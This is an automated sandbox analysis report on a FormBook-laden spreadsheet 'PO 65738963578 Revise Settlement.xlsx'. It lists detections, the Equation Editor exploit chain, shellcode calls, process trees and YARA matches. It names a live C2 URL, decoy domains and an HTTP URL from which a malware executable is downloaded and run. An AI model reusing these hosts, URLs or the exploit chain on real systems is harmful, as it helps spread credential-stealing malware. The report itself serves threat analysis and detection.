Windows Analysis Report
PO 65738963578 Revise Settlement.xlsx

Overview

General Information

Sample Name:	PO 65738963578 Revise Settlement.xlsx
Analysis ID:	626146
MD5:	e5c9c992c088a778a6348f4a58dd78d3
SHA1:	754f386df06785ddd4cb4a04bed626ceab65d5ab
SHA256:	6b8ffb251308a2396f35780df9376b329a6c741419db44ea4f89d88ed932fbf2
Tags:	VelvetSweatshopxlsx
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Shellcode detected

Office equation editor drops PE file

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Office equation editor establishes network connection

Drops PE files to the user root directory

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Potential document exploit detected (unknown TCP traffic)

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Office Equation Editor has been started

Contains functionality to download and launch executables

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Found malware configuration

Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.cortesdisenosroutercnc.com/itq4/"], "decoy": ["worklocalcortland.com", "hostydom.tech", "ittakegenius.com", "clarisfixion.com", "totalzerosband.com", "shop-for-432.club", "exploremytruth.com", "skarpaknivar.com", "teknikunsur.net", "shoppingclick.online", "808gang.net", "solobookings.com", "mikunandina.com", "insumedkap.com", "kingdomcell.com", "qabetalive838475.com", "foxyreal.website", "filmweltruhr.com", "pokibar.com", "girassolpresentes.com", "rprent.com", "klatch22.com", "qam3.com", "bbuur.com", "grandmino.com", "windowcontractor.info", "myownstack.com", "suprebahia.com", "amaliebeac.space", "rugggedclassicvinyl.com", "thevillagetour.com", "obsoletely.xyz", "fintell.online", "mychianfts.net", "skillingyousoftly.com", "mejicat.com", "tntpowerspeedagility.com", "richardklewis.store", "yourdmvhometeam.com", "citestaccnt1631545392.com", "weddingbyneus.com", "mbkjewelry.com", "shubhamsports.com", "bountyhub.xyz", "heritage.solar", "vitalorganicbarsoap.com", "cloandjoe.com", "royalluxextensions.com", "lbrzandvoort.com", "knowmust.xyz", "okpu.top", "balanz.kitchen", "buggy4t.com", "gownstevensond.com", "f4w6.claims", "workingfromgarden.com", "foryourtinyhuman.com", "preventbiotech.com", "happyklikshop.com", "tuyenxanh.com", "lift2.cloud", "skazhiraku.net", "purpleatticexperiment.com", "freebtc.pro"]}

Multi AV Scanner detection for submitted file

Source: PO 65738963578 Revise Settlement.xlsx	Virustotal: Detection: 41%			Perma Link
Source: PO 65738963578 Revise Settlement.xlsx	ReversingLabs: Detection: 29%

Yara detected FormBook

Source: Yara match	File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: www.cortesdisenosroutercnc.com/itq4/	Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeC:	Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeiiC:	Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exej	Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exe	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 2.3.EQNEDT32.EXE.998472.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.931118.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.998472.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.EQNEDT32.EXE.931118.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.idcqz.exe.160000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 198.12.81.20 Port: 80

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405D7A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004069A4 FindFirstFileW,FindClose,	4_2_004069A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0379043F ShellExecuteW,ExitProcess,	2_2_0379043F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_037903A2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03790411 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03790411
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_037902FD ExitProcess,	2_2_037902FD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_037903BC URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_037903BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03790332 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03790332
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0379042A ShellExecuteW,ExitProcess,	2_2_0379042A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03790464 ExitProcess,	2_2_03790464
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03790316 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03790316

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.cortesdisenosroutercnc.com/itq4/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.12.81.20 198.12.81.20

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:42:02 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.17Last-Modified: Fri, 13 May 2022 11:21:13 GMTETag: "3e719-5dee2df4306a6"Accept-Ranges: bytesContent-Length: 255769Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /busy/BUSY.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.20Connection: Keep-Alive

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_037903A2

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20

Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.81.20/busy/BUSY.exe
Source: EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.81.20/busy/BUSY.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.81.20/busy/BUSY.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://198.12.81.20/busy/BUSY.exej
Source: EQNEDT32.EXE, 00000002.00000003.957494354.0000000000955000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.959904121.000000000040A000.00000008.00000001.01000000.00000004.sdmp, BUSY[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8559C53.emf

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_037903A2

Source: global traffic

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_0040580F

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 2.2.EQNEDT32.EXE.931118.0.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.EQNEDT32.EXE.931118.0.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_00403646

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B51890	5_2_00B51890
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B596A0	5_2_00B596A0
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B57E88	5_2_00B57E88
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B59C12	5_2_00B59C12
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B5C3BD	5_2_00B5C3BD
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B5A184	5_2_00B5A184
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B5B3F1	5_2_00B5B3F1
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00110A56	5_2_00110A56

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: PO 65738963578 Revise Settlement.xlsx	Virustotal: Detection: 41%
Source: PO 65738963578 Revise Settlement.xlsx	ReversingLabs: Detection: 29%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
